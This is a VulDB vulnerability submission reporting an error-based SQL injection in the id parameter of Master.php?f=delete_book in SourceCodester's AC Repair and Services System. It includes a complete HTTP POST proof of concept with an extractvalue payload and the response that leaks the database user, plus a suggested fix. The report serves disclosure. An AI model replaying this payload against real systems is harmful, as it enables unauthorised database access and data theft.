Submit #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.phpinfo

TitelSourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
BeschreibungI find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=delete_book. POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780 Content-Length: 906 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="fullname" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="email" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="contact" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="address" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="services[]" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="status" 1 -----------------------------25039842273186474810708140780-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter.My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
Quelle⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Benutzer
 fushuling (UID 45488)
Einreichung11.07.2023 17:42 (vor 3 Jahren)
Moderieren13.07.2023 11:49 (2 days later)
StatusAkzeptiert
VulDB Eintrag234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!